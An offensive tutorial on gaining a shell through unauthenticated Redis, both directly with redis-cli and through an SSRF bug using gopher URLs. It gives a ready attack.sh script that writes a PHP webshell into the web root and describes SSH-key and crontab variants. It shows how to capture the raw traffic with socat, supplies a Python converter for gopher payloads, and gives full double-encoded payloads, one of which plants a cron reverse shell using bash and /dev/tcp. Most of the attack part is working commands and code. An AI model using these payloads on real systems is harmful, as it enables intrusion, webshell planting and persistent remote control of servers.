Writing a shell through Redis with the gopher protocol

Introduction

Unauthenticated Redis instances are still common. If the Redis port is reachable from the Internet, exploitation is straightforward. If it is not, but the site has an SSRF vulnerability, the unauthenticated Redis can still be exploited: the SSRF lets the attacker talk to the internal port, and the gopher protocol lets arbitrary bytes be sent over it.

Exploitation

  1. Reachable from the Internet

    Start with the case where Redis is reachable directly. The idea is to repoint Redis's RDB dump at the web root and give it a .php name, store the PHP in a key, and SAVE: the dump file is binary, but PHP ignores everything outside the <?php ... ?> tags, so the file still executes. Write it as a script, attack.sh:

    # Repoint the RDB dump at the web root and give it a .php name
    redis-cli -h $1 -p $2 config set dir /the/web/path
    redis-cli -h $1 -p $2 config set dbfilename shell.php
    # Store the PHP in a key (the same test payload the gopher section uses),
    # then SAVE writes the dump, RDB header and all, to /the/web/path/shell.php
    redis-cli -h $1 -p $2 set 1 "<?php phpinfo(); ?>"
    redis-cli -h $1 -p $2 save
    

    Make it executable and run it against the target:

    chmod +x attack.sh
    ./attack.sh target_ip target_port
    

    A webshell is not the only option: point dir at a user's .ssh directory and dbfilename at authorized_keys, store a public key padded with newlines on both sides (so the surrounding RDB bytes do not land on its line), and SAVE gives SSH access as that user.

  2. SSRF + gopher

    The focus here is how to construct the gopher protocol payload.

    • First build a local environment (start Redis) and put socat in front of it as a port forwarder:

      socat -v tcp-listen:4445,fork tcp-connect:127.0.0.1:6379
      

      -v makes socat print the traffic it forwards, which is how we capture the raw protocol (RESP) that redis-cli puts on the wire.

    • Then connect a Redis client to port 4445 and run the same four commands as in attack.sh:

      [image 1]

    • socat shows the forwarded traffic:

      *4\r
      $6\r
      config\r
      $3\r
      set\r
      $3\r
      dir\r
      $13\r
      /var/www/html\r
      < 2020/03/28 18:58:25.929522  length=5 from=9513 to=9517
      +OK\r
      > 2020/03/28 18:58:30.152852  length=60 from=71 to=130
      *4\r
      $6\r
      config\r
      $3\r
      set\r
      $10\r
      dbfilename\r
      $11\r
      shell33.php\r
      < 2020/03/28 18:58:30.153059  length=5 from=9518 to=9522
      +OK\r
      > 2020/03/28 18:58:46.344559  length=46 from=131 to=176
      *3\r
      $3\r
      set\r
      $1\r
      1\r
      $19\r
      <?php phpinfo(); ?>\r
      < 2020/03/28 18:58:46.344820  length=5 from=9523 to=9527
      +OK\r
      > 2020/03/28 18:58:48.369868  length=14 from=177 to=190
      *1\r
      $4\r
      save\r
      < 2020/03/28 18:58:48.691221  length=5 from=9528 to=9532
      +OK\r
      

      Note that a lot of traffic may precede this (redis-cli fetches command metadata with COMMAND when it connects, for example); ignore it and cut out only the part we need. Don't get lost in it: look carefully and the pattern always shows.

    • Convert the capture with a script. This one is JoyChou's, from the "SSRF in PHP" post in the references. Its output percent-encodes only the CR/LF pairs, so it needs one more round of URL-encoding when it is placed into a query string (which is where the %250d%250a in the payloads below comes from):

      #coding: utf-8
      #author: JoyChou
      # Usage: python gopher.py socat_dump.txt
      # Turns a `socat -v` capture of redis-cli traffic into the data part of a gopher URL.
      import sys
      
      exp = ''
      
      with open(sys.argv[1]) as f:
          for line in f.readlines():
              # Skip socat's own '>' / '<' timestamp lines and the '+OK' replies,
              # but keep the payload line, which also begins with '<' ("<?php ...")
              if line[0] in '><+' and line[:5] != "<?php":
                  continue
              # Does the line end in a literal \r? (socat prints CR as backslash-r)
              elif line[-3:-1] == r'\r':
                  # A line holding only \r: the newline before it belonged to the
                  # value, so emit %0a and then the %0d%0a terminator
                  if len(line) == 3:
                      exp = exp + '%0a%0d%0a'
                  else:
                      line = line.replace(r'\r', '%0d%0a')
                      # Drop the trailing newline socat added
                      line = line.replace('\n', '')
                      exp = exp + line
              # An empty line is a bare LF inside a multi-line value
              elif line == '\x0a':
                  exp = exp + '%0a'
              else:
                  line = line.replace('\n', '')
                  exp = exp + line
      print(exp)
      

    • Replay the result against the local Redis:

      [image 2]

      Four +OK replies, one per command, mean the replay succeeded.

    • With the local test done, fire the payload at the SSRF endpoint. Two details of the URL matter: the `_` right after the port is the one-character gopher item type, which the client strips before sending the rest to the socket verbatim; and the CRLFs are double-encoded as %250D%250A because the web server decodes the query string once and libcurl decodes the gopher URL once more, so the gopher URL that reaches libcurl must still carry %0D%0A.

      curl -v 'http://127.0.0.1/ssrf2.php?url=gopher://127.0.0.1:6379/_*4%250D%250A$6%250D%250Aconfig%250D%250A$3%250D%250Aset%250D%250A$3%250D%250Adir%250D%250A$13%250D%250A/var/www/html%250D%250A*4%250D%250A$6%250D%250Aconfig%250D%250A$3%250D%250Aset%250D%250A$10%250D%250Adbfilename%250D%250A$11%250D%250Ashell33.php%250D%250A*3%250D%250A$3%250D%250Aset%250D%250A$1%250D%250A1%250D%250A$19%250D%250A%253C?php%2520phpinfo();%2520?%253E%250D%250A*1%250D%250A$4%250D%250Asave%250D%250A*1%250D%250A$4%250D%250Aquit%250D%250A'
      
      

      [image 3]

      The file is written.

      A crontab can be written the same way: dir becomes the cron spool, dbfilename the user name, and the value is a cron line padded with newlines so the RDB bytes around it stay on their own lines. The /var/spool/cron/root layout below is the RHEL/CentOS one; on Debian/Ubuntu the per-user files live under /var/spool/cron/crontabs/ and cron is pickier about the file's contents, so this variant is commonly reported to fail there:

      http://127.0.0.1/ssrf2.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F127.0.0.1%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a
      

Update

Tools

Alright, I admit it: a ready-made tool makes this much easier.

https://github.com/firebroo/sec_tools

References

  • SSRF in PHP
